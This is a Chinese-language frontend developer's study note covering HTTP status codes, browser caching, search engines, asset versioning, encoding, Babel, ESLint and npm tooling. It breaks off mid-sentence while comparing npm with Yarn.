http响应状态码指示特定http请求是否已成功完成,响应分为五类:信息响应,成功响应,重定向,客户端错误和服务端错误。

1. 信息响应

```js
100 // Continue 所有内容有效可继续请求,若请求已完成则忽略
101 // Switching Protocol 该代码是响应客户端的 Upgrade 标头发送的,并且指示服务器也正在切换的协议。
102 // Processing 此代码表示服务器已收到并正在处理请求,但没有响应可用
```

2. 成功响应

```js
200 // OK 请求成功
204 // No Content 服务器已成功处理请求,但不需要返回实体,并且希望返回更新了的元信息
// 实际抓包可以看到,OPTIONS 预检请求通常返回 204,因此没有响应体。
```

3. 重定向

```js
301 // Moved Permanently 被请求的资源已永久移动到新位置(应该返回新的地址)
302 // Found 请求的资源临时从不同的 URI 响应请求
304 // Not Modified 协商缓存命中时返回,一般用于带条件的 GET 或 HEAD 请求
```

4. 客户端响应

```js
400 // Bad Request 语义或请求参数有误,请求无法被服务器理解
401 // Unauthorized 当前请求需要用户验证。
403 // Forbidden 服务器已经接受到请求,但拒绝执行它。服务器可以返回拒绝执行原因
404 // Not Found 请求所希望的资源未在服务器发现
405 // Method Not Allowed 响应返回允许的请求方式
408 // Request Timeout 请求超时,客户端没有在服务端预备等待的时间内完成一个请求的发送
```

**注意:**401是说客户端需要认证,比如需要登录;而403是客户端认证通过(比如登录成功),但是没有权限。

5.
服务端响应 ```js 500 // Internal Server Error 服务器遇到不知如何处理的情况 501 // Not Implemented 此请求方法不被服务器支持且无法被处理 502 // Bad Gateway 服务器作为网关需要得到一个处理这个请求的响应,但是得到一个错误的响应 503 // Service Unavailable 服务器没有准备好处理请求(比如宕机或服务没起来) 504 // Gateway Timeout 服务器(不一定是 Web 服务器)正在作为一个网关或代理来完成客户(如您的浏览器或我们的 CheckUpDown 机器人)访问所需网址的请求。 为了完成您的 HTTP 请求, 该服务器访问一个上游服务器, 但没得到及时的响应。这通常意味着上游服务器已关闭(不响应网关 / 代理),而不是上游服务器和网关/代理在交换数据的协议上不一致。(比如ip地址可以ping通,但具体项目的后端没有起来,就报504错误) 505 // HTTP Version Not Supported 服务器不支持请求中使用的http版本 // 503的一个场景: // 公司的公网域名解析到具体服务实例上,如果实例销毁或将域名与服务解绑, // 此时若dns解析仍指向实例,就会报503。 // 若是访问一个不存在的域名,则直接回找不到页面。 ``` **注意:**502状态码可以这样理解,比如当ngnix充当反向代理时,会将http协议的请求转换为其他协议的请求,其他协议请求再给对应语言的进程处理,当处理完响应的内容无法被ngnix理解就会报502 Bad Gateway。而500一般是服务器内部逻辑出错,503是服务器没有起来或者是服务器处理不过来。。。 502 Bad Gateway 是一种HTTP协议的服务器端错误状态代码,它表示作为网关或代理角色的服务器,从上游服务器(如tomcat、php-fpm)中接收到的响应是无效的。 Gateway (网关)在计算机网络体系中可以指代不同的设备,502 错误通常不是客户端能够修复的,而是需要由途径的Web服务器或者代理服务器对其进行修复。 #### ***缓存相关*** ***强制和协商缓存*** 参考:[强制缓存与协商缓存][aboutForceCacheUrl]、[http缓存控制][aboutConsultCacheUrl]、[浏览器缓存浅析][browserCacheAnalyseUrl]、[浏览器的默认策略][aboutBrowserDefaultUrl] 浏览器的缓存机制也就是我们常说的http缓存机制,是根据http报文的缓存标识进行。第一次浏览器请求服务器,会根据响应报文中的http头的缓存标识,决定是否缓存结果,是则存储并将标识存入浏览器缓存中。 **注意**: 1. 浏览器每次发送请求,都会先在浏览器缓存中查找该请求的结果以及缓存标识 2. 浏览器每次拿到返回的请求结果都会将该结果和缓存标识存入到浏览器缓存中 根据是否向服务器重新发送http请求,将缓存分为强制和协商缓存: **强制缓存:**根据缓存标识来决定缓存是否有效,若没有缓存标识和结果则直接请求服务器;若存在但失效则发起协商缓存请求过程;若存在且有效则直接返回; 标识: 在 http1.0 时代,给客户端设定缓存方式可通过两个字段——Pragma和Expires来规范。Pragma是用来禁用缓存的,因此Expires(-1或0则是不缓存)就是用来开启缓存的,如果二者同时存在,则起作用的是Pragma `Expires`是http1.0的产物,值为服务器返回该请求结果缓存的到期时间,绝对时间,若身处不同时区则不准确,因此http1.1出现了`Cache-control`,二者同时存在时`Cache-control`优先级高,是控制浏览器和其他中间缓存如何缓存各个响应以及缓存多久。有以下几种取值(多个取值可以逗号分隔): 1. public 所有内容都将被缓存(客户端和代理服务器都可缓存),即使标识显示不可缓存,也可以缓存 2. private 所有内容只有对应的单个用户可以缓存,Cache-Control的默认取值,例如,用户的浏览器可以缓存包含用户私人信息的 HTML 网页,但 CDN 却不能缓存。 3. no-cache:客户端缓存内容,但是是否使用缓存则需要经过协商缓存来验证决定,即每次通过标识(如ETag)先与服务器确认缓存是否变化,如果没有变化则可以继续使用。 4. no-store:直接禁止浏览器以及所有中间代理缓存任何版本的响应 5. 
max-age=xxx (xxx is numeric):缓存内容将在xxx秒后失效

当二者同时存在Cache-control优先级高。no-cache和no-store的区别是:前者会缓存,但每次使用缓存前都要先向服务器验证(即走协商缓存),由服务器决定能否继续使用;后者则是完全不缓存。

参考:https://juejin.im/post/6844903801778864136

**优先级:** Pragma > Cache-control > Expires

缓存位置分为内存缓存(会将编译解析后的文件,直接存入该进程的内存中,一旦进程关闭则进程的内存就清空)和硬盘缓存。

**协商缓存:**强制缓存失效后,浏览器携带协商缓存标识向**服务器**发起请求,由服务器根据缓存标识来决定是否使用缓存的过程。

协商缓存生效,返回304过程:

![consultCache](http://wx2.sinaimg.cn/mw690/006XbPrRly1gbk9d0yf6uj30su0nqjva.jpg)

***务必注意:***协商缓存是先去请求服务器,判断是否更新,若没有更新则返回304码,然后再去浏览器缓存中拿数据。之所以发送条件请求,是因为若条件成立,则可以省略传输响应体的时间,但连接还是需要建立的。如果不想走304则可以强制刷新。

同样,协商缓存的标识也是在响应报文的HTTP头中和请求结果一起返回给浏览器的,控制协商缓存的字段分别有:Last-Modified / If-Modified-Since和Etag / If-None-Match,`其中Etag / If-None-Match的优先级比Last-Modified / If-Modified-Since高`。

强制缓存优先于协商缓存,若强制缓存生效则直接使用,若不生效则进行协商缓存,协商缓存由服务器确定是否使用。

总的过程如下:

![consultCache](http://wx4.sinaimg.cn/mw690/006XbPrRly1gbk9d0yz4bj30t00p4afc.jpg)

在 Chrome 的 devtools 中勾选 Disable cache 选项,发送的请求会去掉 If-Modified-Since 这个 Header,同时设置 Cache-Control: no-cache、Pragma: no-cache,每次请求均为 200。

Expires:HTTP1.0 的特性,标识该资源过期的时间点,它是一个绝对值,格林威治时间(Greenwich Mean Time, GMT),即在这个时间点之后,缓存的资源过期;优先级:Cache-Control 优先级高于 Expires,为了兼容,通常两个头部同时设置;浏览器默认行为:其实就算 Response Header 中没有设置 Cache-Control 和 Expires,浏览器仍然会缓存某些资源,这是浏览器的默认行为,是为了提升性能进行的优化,每个浏览器的行为可能不一致,有些浏览器甚至没有这样的优化。

Last-Modified(Response Header)与 If-Modified-Since(Request Header)是一对报文头,属于 http 1.0。If-Modified-Since 是一个请求首部字段,并且只能用在 GET 或者 HEAD 请求中。Last-Modified 是一个响应首部字段,包含服务器认定的资源作出修改的日期及时间。当带着 If-Modified-Since 头访问服务器请求资源时,服务器会检查 Last-Modified,如果 Last-Modified 的时间早于或等于 If-Modified-Since 则会返回一个不带主体的 304 响应,否则将重新返回资源。

ETag 能解决什么问题?
- Last-Modified 标注的最后修改只能精确到秒级,如果某些文件在 1 秒钟以内,被修改多次的话,它将不能准确标注文件的新鲜度; - 某些文件也许会周期性的更改,但是他的内容并不改变(仅仅改变的修改时间),但 Last-Modified 却改变了,导致文件没法使用缓存,因此不能说打开了,修改时间就发生了变化 - 有可能存在服务器没有准确获取文件修改时间,或者与代理服务器时间不一致等情形。 优先级:ETag 优先级比 Last-Modified 高,同时存在时会以 ETag 为准。 nginx 中 etag 由响应头的 Last-Modified 与 Content-Length 表示为十六进制组合而成。Last-Modified 是由一个 unix timestamp 表示,则意味着它只能作用于秒级的改变。 如果 http 响应头中 ETag 值改变了,是否意味着文件内容一定已经更改? 此时文件大小没有发生更改,ETag 不会改变。但这需要极其苛刻的条件:1s 内更改文件,并且保持文件大小不变。这种情况出现概率很低,因此忽略了 200 from prefetch cache 在 preload 或 prefetch 的资源加载时,两者也是均存储在 http cache,当资源加载完成后,如果资源是可以被缓存的,那么其被存储在 http cache 中等待后续使用;如果资源不可被缓存,那么其在被使用前均存储在 memory cache。 浏览器可以在内存、硬盘中开辟一个空间用于保存请求资源副本。我们经常调试时在 DevTools Network 里看到 Memory Cache(內存缓存)和 Disk Cache(硬盘缓存),指的就是缓存所在的位置。请求一个资源时,会按照优先级(Service Worker -> Memory Cache -> Disk Cache -> Push Cache)依次查找缓存,如果命中则使用缓存,否则发起请求。 ***浏览器刷新行为*** 1. 在URI输入栏中输入,然后回车/通过书签访问 2. F5(command + R)/点击工具栏中的刷新按钮/右键菜单重新加载 3. Ctrl + F5 / command + shift + R 第二种刷新方式:让浏览器无论如何都发送一个http请求给Server,也就是说即使在强制缓存生效的情况下,这次发送的请求头里会有类似`Cache-Control: max-age=0`的字样,也就是chrome让强制缓存失效。。。当然如果有协商缓存标识,则依然会带上,因此这种情况可能会返回304状态码。 第三种刷新方式:这种就是强制刷新,不但需要重新发送请求,而且将协商缓存标识全部去掉。。。为了保证从服务器拿到的内容是全新的(防止中间代理服务器缓存),还需要添加一些http headers如`Cache-Control: no-cache、Pragma: no-cache`,这样就能从服务端获取到最新的数据。**但需要注意**,假如这时的服务区并不是中央服务器,而是地区服务器,而地区服务器又没有及时拉取原服务器的文件,此时返给浏览器的仍然是旧文件。还有就是浏览器与地区服务器之间可能存在很多代理,如果代码不认无缓存请求头的话,返回的文件也是旧文件,但这种可能性很小。综上:这里的强制刷新的请求头对于浏览器和cdn服务器应该是没问题的,但不排除中间代理有问题,还有就是地区cdn服务器并没有及时与源服务器同步数据,这时都可能返回旧文件。 还有就是,一般情况下为了避免缓存问题,我们都习惯将文件名拼接上hash值,这样文件不同,肯定就会溯源找最新文件了。还有一种情况,文件名一直只是改变#、?号后面的值,这种情况严格来说文件是一样的,只是参数不同而已。如果这个cdn服务器比较智能,就是可以识别出这种文件是同一个文件,就有很大可能命中缓存。但如果这个cdn服务器比较耿直,严格按照uri来匹配资源,此时获取的反而是最新的文件。 许多放图片的CDN可以通过参数来调整图片,比如: xxx.com/a.png 是原图 xxx.com/a.png?w=1 xxx.com/a.png?q=90 是90%质量的图片280 是宽度压缩到1280px的图片 比如前端在代码里配的地址是:http://xxx.a.pdf 后续文件更新了,如果没有刷新缓存,前端地址也没变,访问的肯定是缓存的旧文件。 除非等到12小时自动更新缓存,或者手动强制刷新。但如果每次都刷新缓存,其实cdn的效果意义就不太大了。。。 所以下次,他们上传文件的时候,要么可以直接修改文件名再上传,比如修改为http://xxx.a.v1.pdf,然后前端再更新,这样最靠谱 
还有就是配置前端的地址,改为http://xxx.a.pdf?124504524 这种时间撮模式,但这样也同样失去了cdn的意义,因为时间戳每次都变,所以每次都会去源服务器拉取最新的。另外一个缺点:不是很靠谱(因为有的智能cdn不会根据?后面的值进行对比) `Service Worker、Memory Cache、Disk Cache 和 Push Cache`,那请求的时候 from memory cache 和 from disk cache 的依据是什么? 1. 如果开启了Service Worker首先会从Service Worker中拿 2. 如果新开一个以前打开过的页面缓存会从Disk Cache中拿(前提是命中强缓存) 3. 刷新当前页面时浏览器会根据当前运行环境内存来决定是从 Memory Cache 还是 从Disk Cache中拿 ***关键字搜索发生了什么*** 获得网站网页资料,能够建立数据库并提供查询的系统,分为两个基本类别:**全文搜索引擎(FullText Search Engine)和分类目录Directory)** **全文搜索引擎**的数据库是依靠一个叫“网络机器人(Spider)”或叫“网络蜘蛛(crawlers)”的软件,通过网络上的各种链接自动获取大量网页信息内容,并按以定的规则分析整理形成的。Google、百度都是比较典型的全文搜索引擎系统。 **分类目录**则是通过人工的方式收集整理网站资料形成数据库的,比如雅虎中国以及国内的搜狐、新浪、网易分类目录。另外,在网上的一些导航站点,也可以归属为原始的分类目录,比如“网址之家”。 全文搜索引擎和分类目录在使用上各有长短。全文搜索引擎因为依靠软件进行,所以数据库的容量非常庞大,但是,它的查询结果往往不够准确;分类目录依靠人工收集和整理网站,能够提供更为准确的查询结果,但收集的内容却非常有限。 **全文搜索引擎的“网络机器人”或“网络蜘蛛”**是一种网络上的软件,它遍历Web空间,能够扫描一定IP地址范围内的网站,并沿着网络上的链接从一个网页到另一个网页,从一个网站到另一个网站采集网页资料。它为保证采集的资料最新,还会回访已抓取过的网页。 网络机器人或网络蜘蛛采集的网页,还要有其它程序进行分析,根据一定的相关度算法进行大量的计算建立网页索引,才能添加到索引数据库中。我们平时看到的全文搜索引擎,实际上只是一个搜索引擎系统的检索界面,当**你输入关键词进行查询时,搜索引擎会从庞大的数据库中找到符合该关键词的所有相关网页的索引,并按一定的排名规则呈现给我们**。不同的搜索引擎,网页索引数据库不同,排名规则也不尽相同 原理可以分为三步: 1. 从互联网上抓取网页 利用能够从互联网上自动收集网页的Spider系统程序,自动访问互联网,并沿着任何网页中的所有URL爬到其它网页,重复这过程,并把爬过的所有网页收集回来。 2. 建立索引数据库 由分析索引系统程序对收集回来的网页进行分析,提取相关网页信息(包括网页所在URL、编码类型、页面内容包含的关键词、关键词位置、生成时间、大小、与其它网页的链接关系等),根据一定的相关度算法进行大量复杂计算,得到每一个网页针对页面内容中及超链中每一个关键词的相关度(或重要性),然后用这些相关信息建立网页索引数据库。 3. 在索引数据库中搜索排序 当用户输入关键词搜索后,由搜索系统程序从网页索引数据库中找到符合该关键词的所有相关网页。因为所有相关网页针对该关键词的相关度早已算好,所以只需按照现成的相关度数值排序,相关度越高,排名越靠前。 最后,由页面生成系统将搜索结果的链接地址和页面内容摘要等内容组织起来返回给用户。 #### ***版本控制相关*** 前端所谓的版本控制,一般说的是前端资源(比如css,js,img等)的版本控制和代码的版本控制系统(git,svn等); **前端资源版本管理** 前端资源的版本控制主要是解决缓存问题的。。。例如:文件内容修改了,但名字没有改,浏览器不强制刷新则访问的则很可能是缓存里的内容。如果每次修改都给文件添加一个版本号,势必繁琐(为了统一版本,每次修改一个文件都需要将其他所有文件的版本号更新)。既然版本号不易控制,若根据文件内容生成hash值,将版本号改为hash值,会稍微好一些。但对于大型应用,资源文件一般部署在cdn上,主文件部署在服务器上,那二者谁先发布呢?如下 ```js <link rel="stylesheet" href="a.css?v=e0279"></link> <script src="a.js?v=abb35"></script> ``` 1. 先发资源文件,之前的资源文件被覆盖,在主文件发布成功之前,没有缓存或强制刷新的用户,会导致页面错乱 2. 
先发主文件,在资源文件发布成功之前,用户访问到得资源文件都是旧的 因为上面文件的url只是query不同,因此相当于同一个文件,所以是覆盖式。。。如果将文件名改了,则就不存在覆盖的问题了,这样新版和旧版资源文件就同时存在,于是代码变成如下: ```js <link rel="stylesheet" href="a.e0279.css"></link> <script src="a.e0279.js"></script> ``` 此时先发布资源文件,成功后再发布主文件就没有问题了。 而如何生成这个hash就是构建的工作了,主要有`hash、chunkhash、contenthash`三种: 1. hash与整个项目构建相关,一个文件改变则所有文件都变 2. chunkhash是根据入口文件进行解析、构建对应的chunk的,生成对应的hash值 3. contenthash是针对文件内容级别,只有文件内容改变才会改变 之所以出现contenthash,是因为chunkhash有个问题,比如a文件修改了,则与其关联(如引用)的相关文件的hash值也会改变,也就失去缓存的目的了,如下: ![dpr&ppi](/jsArt/assets/images/js-theory/chunk-contenthash.png) **代码版本管理** 代码版本管理主要分集中式(svn)和分布式(git),那二者什么区别呢? 集中式:版本库是集中存放在中央服务器的,干活的时候先联网拉下代码,然后修改,改完再推送到服务器。没有网络无法工作,好比图书馆,不开馆没法借书。主要问题就是严重依赖网络 分布式:不需要联网没有中央服务器,每人电脑上的都是一个完整的版本库。不联网时如何多人协作,其实网络说的是外网,局域网还是需要的,相互之间的修改就可以通过局域网相互之间推送。。。其实即使分布式,我们也很少相互之间推送代码,而是将代码推送到一台充当“中央服务器”的地方,这里的“中央服务器”只是方便大家相互之间交流而已,以防止同事请假,电脑故障等情况。。。 从上面看感觉分布式比集中式的优势就是不需要联网,其实作为分布式的代表git,在分支管理上远胜于svn!!! #### ***编码相关*** 编码其实就是一种数据格式转换为另外一种格式的过程。 **ASCII码**计算机最终识别的是二进制数据格式,一个字节八位,也就是256种状态,每种状态可以用一个字符表示。而美国制定的英文字符与二进制数的映射就是ASCII码,一直用到现在。 在ASCII中,用7个二进制位表示一个打印或不可打印的字符,共表示128个字符,其中95个可打印或显示的字符,其他的则为不可打印或显示的字符。所谓不可打印是指那些禁止在报纸,电视或其他媒体上出现的符号,这些符号被用来表示一些特定的功能,如回车,换行,制表符等。。。比如空格SPACE是32(二进制00100000),大写的字母A是65(二进制01000001)。这128个符号,只占用了一个字节的后面7位,最前面的一位统一规定为0。 英文字符7位就可以表示完全,但对于汉语而言就远远不够了,汉字大概就是10万+,两个字节才表示65535种,因此汉语还有四字节表示一个字。也就是中国的国标GB 但世界各国的编码都不一样,有么有一种方式可以统一呢,这就是**unicode码**,虽然unicode码解决了是否统一的问题,但数据在网络上传输时是需要占带宽的,因此如何合理存储这些编码就尤为重要,因为一个英文字符用unicode来表示势必占更多内存。。。因此就出现了**utf-8**,是unicode编码的实现方式之一。对于部分编码,存储时还涉及`Little endian 和Big endian-`问题,也就是字节存储的先后顺序问题。 **base64编码**Base64是一种基于64个可打印字符来表示二进制数据的表示方法。由于2的6次方等于64,所以每6个二进制位为一个单元,对应某个可打印字符。三个字节有24个二进制位(比特位),对应于4个Base64单元,即3个字节对应的符号可以用4个可打印字符表示。之所以诞生,因为早期http协议等都只能传输ascii格式,但有些数据(比如图片)转化为二进制后,超过了ascii表示的范围。 btoa可以将字符串转为base64格式,而atob是将base64转为正常字符串,是window下的api ```js // base64编码 btoa('this is a example'); => "dGhpcyBpcyBhIGV4YW1wbGU=" // base64解码 atob("dGhpcyBpcyBhIGV4YW1wbGU=") 'this is a example' ``` `1. 
URI编码方法` 在因特网上传送URL,只能采用ASCII字符集,也就是说URL只能使用英文字母、阿拉伯数字和某些标点符号,不能使用其他文字和符号,即只有字母和数字[0-9a-zA-Z]、一些特殊符号$-_.+!*'()[不包括双引号]、以及某些保留字(空格转换为+),才可以不经过编码直接用于URL,这意味着 如果URL中有汉字,就必须编码后使用。 但是麻烦的是 标准的国际组织并没有规定具体的编码方法,而是交给应用程序(浏览器)自己决定。 这导致"URL编码"成为了一个混乱的领域。 Global 对象的`encodeURI()和encodeURIComponent()`方法可以对`URI`(`Uniform Resource Identifiers`,通用资源标识符)进行编码,以便发送给浏览器。**有效的 URI 中不能包含某些字符,例如空格**。而这两个 URI 编码方法就可以对 URI 进行编码,**它们用特殊的 UTF8 编码替换所有无效的字符,从而让浏览器能够接受和理解**。 ```js // encodeURI()一般对整个uri进行编码, encodeURI(";,/?:@&=+$-_.!~*'()#"); // ";,/?:@&=+$-_.!~*'()#",几乎常用的都没有被编码 encodeURI(" "); // "%20",空格被编码了 decodeURI("%20"); // " " // encodeURIComponent()只对一段,一般是编码location.origin后面的部分 encodeURIComponent("().!~*'-_"); // "().!~*'-_" encodeURIComponent(":/ ?&=#"); // "%3A%2F%20%3F%26%3D%23" decodeURIComponent("%3A%2F%20%3F%26%3D%23"); // ":/ ?&=#" // 解码被编码多次的url let str = "https%3A%2F%2Fwww.baidu.com%2F%3Fa%3D%25E4%25B8%25AD" const isEncode = str => str.includes('%25'); const getDecodeUrl = str => { while(isEncode(str)) { str = decodeURIComponent(str); } return decodeURIComponent(str) } getDecodeUrl(str) ``` 中文域名(需要中文转码成ascii码) **视频编码** 视频文件本身其实是一个容器(container),里面包括了视频和音频,也可能有字幕等其他内容。 常见的AVI、RMVB、MKV、ASF、WMV、MP4、3GP、FLV等文件其实只能算是一种封装标准。 一个完整的视频文件是由音频和视频2部分组成的。H264、Xvid等就是视频编码格式,MP3、AAC等就是音频编码格式。 衡量视频,又是用的什么指标参数呢?最主要的一个,就是帧率(Frame Rate)。在视频中,一个帧(Frame)就是指一幅静止的画面。帧率,就是指视频每秒钟包括的画面数量(FPS,Frame per second)。 [视频编码](https://juejin.im/post/5dd359f4e51d453af47cea29) #### ***构建相关*** ***部署脚本*** ***Babel*** 参考:[babel中文文档(官方)][babelChineseDocsUrl] 是一个js编译器,支持代码里写高版本的代码,通过语法转换器支持最新版本的js语法,但babel只转换语法(如箭头函数),若需要支持新的api或全局变量,需要用polyfill。 polyfill和shim很像但又不同,shim的话是引入一个库,将不同的api封装成一种,比如 jQuery 的 $.ajax 封装了 XMLHttpRequest 和 IE 用 ActiveXObject 方式创建 xhr 对象;而polyfill 是 shim 的一种,一个polyfill就是一个用在浏览器API上的shim。我们通常的做法是先检查当前浏览器是否支持某个API,如果不支持的话就加载对应的polyfill.然后新旧浏览器就都可以使用这个API了 babel 是js的编译器,是将下一代js的语法编译成各个平台都兼容的语法格式。官网不同平台上的使用方式,无非是安装babel的核心代码及各种presets,plugin。。。 
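上文说 polyfill 的套路是"先检查当前浏览器是否支持某个 API,不支持再补齐"。下面以 `Array.prototype.includes` 为例做一个极简示意(仅演示思路,忽略 NaN、fromIndex 等边界情况,并非 core-js 的标准实现):

```javascript
// 先检测宿主环境是否已支持,缺了才补齐(不要无条件覆盖原生实现)
if (!Array.prototype.includes) {
  Array.prototype.includes = function (item) {
    // 简化版:借助 indexOf 实现,NaN 等边界情况未处理
    return this.indexOf(item) !== -1
  }
}

console.log([1, 2, 3].includes(2)) // true
```

babel 只负责语法转换,这类 API 层面的缺口正是要靠 polyfill(如 babel-polyfill)来补。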
**注意**,presets与plugin的关系,其实babel有很多细粒度很小的插件,具体转译那种语法可以按需引入,这样有很强的灵活性。。。但假如有很多语法都需要转化,则需要引入很多,此时babel官方就提供了plugin的合集,也就是presets。 而`babel-preset-env`就相当于 es2015 ,es2016 ,es2017 及最新版本。 而stage是将TC39 提案分为以下几个阶段: - Stage 0 - 稻草人: 只是一个想法,可能是 babel 插件。 - Stage 1 - 提案: 初步尝试。 - Stage 2 - 初稿: 完成初步规范。 - Stage 3 - 候选: 完成规范和浏览器初步实现。 - Stage 4 - 完成: 将被添加到下一年度发布。 stage只是提案,是否最终发布不能确定,只是实验性的语法,而env则是发布的。 同时配置了plugin和presets后,会有一个执行顺序如下: - Plugin 会运行在 Presets 之前。 - Plugin 会从第一个开始顺序执行。ordering is first to last. - Preset 的顺序则刚好相反(从最后一个逆序执行)。 总结起来,`env`是纳入规范的新语法特性,而stage则是未纳入规范的提案,但有些api的调用并不是什么新的语法,比如Array.isArray这个方法在低版本ie浏览器中,就无法执行,因此还需要polyfill(当然自己写个方法实现也可以)。。。 还要知道`babel-polifill`是与普通针对单个polifill是有区别的,它的初衷是模拟(emulate)一整套 ES2015+ 运行时环境,所以它的确会以全局变量的形式 polyfill Map、Set、Promise 之类的类型,也的确会以类似 Array.prototype.includes() 的方式去注入污染原型,这也是官网中提到最适合应用级开发的 polyfill,再次提醒如果你在开发 library 的话,不推荐使用(或者说绝对不要使用)。 babel-polyfill:需要在你自己的代码中手工引入(最好放在 vendor 里),它会以全局变量污染的方式 polyfill 内建类(如 Map、Set、Promise 等),同时也会通过修改 Array、String、Object 等原型的方式添加实例方法(如 Array.prototype.includes()、String.prototype.padStart() 等),内建类的静态方法(如 Array.from() 等)也会被 polyfill。babel-polyfill 适合于开发独立的业务应用,及时全局污染、prototype 被修改也不会受到太大的影响,babel-polyfill 不适合开发第三方类库。 babel-plugin-transform-runtime:需要你在 .babelrc 或 Babel 编译选项中将该插件添加到 plugins 中,插件只会 polyfill 你用到的类或方法,由于采用了沙盒(Sandbox)机制,它不会污染全局变量,同时也不会去修改内建类的原型,带来的坏处是它不会 polyfill 原型上的扩展(例如 Array.prototype.includes() 不会被 polyfill,Array.from() 则会被 polyfill)。插件的方式适合于开发第三方类库,不适合开发需要大量使用 Array 等原型链扩展方法的应用。 ***Eslint*** 是js代码检查工具,代码检查是一种静态的分析,常用于寻找有问题的模式或者代码。对于大多数编程语言来说都会有代码检查,一般来说编译程序会内置检查工具。 js是动态的弱类型的语言,开发中容易出错,因为没有编译程序,为了寻找错误需要在代码运行过程中debugger,而eslint可以让程序元在编码的过程中发现问题而不是在执行的过程中。 eslint有自己的默认配置,还可以自定义配置 [eslint参考](https://www.jianshu.com/p/bf0ffe8e615a) 一般使用eslint都会在package.json里配置脚本,比如 使用cross-env解决跨平台设置NODE_ENV的问题,在大多数Windows命令行中在使用NODE_ENV = production设置环境变量时会报错。同样,Windows和Linux命令如何设置环境变量也有所不同。 使用cross-env可以设置在不同的平台上有相同的NODE_ENV参数。 ```json "scripts": { "dev": "cross-env BABEL_ENV=development 
webpack-dev-server --inline --progress --config build/webpack.dev.conf.js", "build:prod": "cross-env NODE_ENV=production env_config=prod node build/build.js", "build:sit": "cross-env NODE_ENV=production env_config=sit node build/build.js", "lint": "eslint --ext .js,.vue src", "test": "npm run lint", "precommit": "lint-staged", "svgo": "svgo -f src/icons/svg --config=src/icons/svgo.yml" }, "lint-staged": { "src/**/*.{js,vue}": [ "eslint --fix", "git add" ] }, ``` 上面是摘自vue-element-admin的一段,一般在代码完成开发之后,先执行`precommit`,进而会调用eslint的命令,然后根据`.eslintrc.js`配置文件检查项目里的错误,如果有配置错误级别代码格式,并检测到,eslint会指出错误信息。。。然后开发再手动修改错误,再次执行`precommit`并自动修复了问题(这时候只是将文件添加进了暂存区),后续还需要commit,然后才是push等操作 eslint单个文件检测规则 ```js // 1/整个文件范围内禁止规则出现警告 // 将/* eslint-disable */放置于文件最顶部 /* eslint-disable */ alert('foo'); // 2、在文件中临时禁止规则出现警告 // 将需要忽略的代码块用注释包裹起来 /* eslint-disable */ alert('foo'); /* eslint-enable */ // 3、对指定规则的启用或者禁用警告 // 将需要忽略的代码块用注释包裹起来 /* eslint-disable no-alert, no-console */ alert('foo'); console.log('bar'); /* eslint-enable no-alert, no-console */ // 4、对指定行禁用规则警告 // 此方法,有两种形式,参见下方。 alert('foo'); // eslint-disable-line // eslint-disable-next-line alert('foo'); // 5、在指定行上禁用指定的某个规则 alert('foo'); // eslint-disable-line no-alert // eslint-disable-next-line no-alert alert('foo'); // 6、在某个特定的行上禁用多个规则 alert('foo'); // eslint-disable-line no-alert, quotes, semi // eslint-disable-next-line no-alert, quotes, semi alert('foo'); ``` ***npm私服*** npm私服其实就是npm私人服务器,比如cnpm是淘宝的npm镜像,主要目的是下载包的速度快。。。私服需要定时同步npm上的包,(node里有node-scheduled定时任务的包),多数企业项目比较少且简单,单独做私服的意义不是很大。。。 个人在github上的仓库因为是免费的,没有私有仓库一说,但企业一般是付费的,可以建立自己的私有仓库。 私有库的话,需要配置register ,比如`npm config set @mfs:registry http://xxx.net/`,当然也可以直接配置`~/.npmrc`,如果在项目里配置了`.npmrc`文件也可以,比如: ```bash # .npmrc @mfs:registry=http://registry.npm.missfresh.net @mfb:registry=https://registry.npm.taobao.org ``` npm发包其实就是将自己的仓库标准化并公开给所有人,然后用户通过npm search就可以找到包(如果没有发包,则需要找到对应的仓库去克隆),这里的npm search在使用淘宝镜像的情况下不太好使。。。 ***npm包版本命名规则*** npm 使用 semver 包进行版本号解析。 
1.15.2对应的版本时`MAJOR.MINOR.PATCH`: - 1是marjor version; - 15是minor version; - 2是patch version。 MAJOR:这个版本号变化了表示有了一个不可以和上个版本兼容的大更改。 MINOR:这个版本号变化了表示有了增加了新的功能,并且可以向后兼容。 PATCH:这个版本号变化了表示修复了bug,并且可以向后兼容。 因此在工作中,其实保持minor版本即可,这样出现的问题能少些。。。即使后续引入新功能,可以再修改 但你还可能经常看到~,^符号,他们什么意思呢? **波浪符号(~):**他会更新到当前minor version(也就是中间的那位数字)中最新的版本。放到我们的例子中就是:body-parser:~1.15.2,这个库会去匹配更新到1.15.x的最新版本,如果出了一个新的版本为1.16.0,则不会自动升级。波浪符号是曾经npm安装时候的默认符号,现在已经变为了插入符号。 **插入符号(^):**这个符号就显得非常的灵活了,他将会把当前库的版本更新到当前major version(也就是第一位数字)中最新的版本。放到我们的例子中就是:bluebird:^3.3.4,这个库会去匹配3.x.x中最新的版本,但是他不会自动更新到4.0.0。 参考以下(很多规则渗入了人的主观因素,遵循大规律即可): ```js ^1.2.3 := >=1.2.3 <2.0.0 ^0.2.3 := >=0.2.3 <0.3.0 ^0.0.3 := >=0.0.3 <0.0.4 ~1.15.2 := >=1.15.2 <1.16.0 ^3.3.4 := >=3.3.4 <4.0.0 ``` #### **npm 与 cnpm 区别** 用 cnpm 安装一些依赖的时候,有时候会有问题。。。但直接用 npm 则需要科学上网,可以尝试配置[npm-config-china][mirrorconfigchinaurl],虽然里面很多代理依然是淘宝镜像,但还是有差别。。。刚开始配 npm,可能回慢些,这是因为缓存的问题。。。用的多了就好了 1. npm 可以自由配置镜像源 2. 两者缓存位置不同 3. cnpm 安装的库会放在 node_modules 里以下划线开头的文件夹,然后链接到应该在的位置 4. npm 有更多功能(link、audit、publish、npx 等等) 所有 npm 包都是针对 npm 做的,所以最好使用 npm,以防在某个地方被他们的差异坑了 **注意:**其实`npm`和`cnpm`主要差别还是镜像源,因为很多包都是国外的,在国内使用就很慢,因此`cnpm`就做了一个拷贝,但是资源是拷贝过来了,但与`npm`相关的很多`api`则无法通过拷贝过来,因此`cnpm`有些局限性。。。如果通过[npm-config-china][mirrorconfigchinaurl]它来配置,则不但将镜像源改为国内,同时还可以消除`cnpm`的一些怪癖(比如软连接),另外就是完全保留了`npm`的各个`api`。 安装后通过`npm config list`可以查看具体的配置,当然也可以直接访问配置源文件`~/.npmrc` 如果一个包用`npm`下载不下来,可以尝试使用`cnpm`,两者不干扰。 参考:[cnode 社区说 npm][cnodesaynpmurl]、[在中国更换 npm 源][changenpmregistry] #### **npm 与 yarn 区别** “Yarn是由Facebook、Google、Exponent 和 Tilde 联合推出了一个新的 JS 包管理工具 ,正如官方文档中写的,Yarn 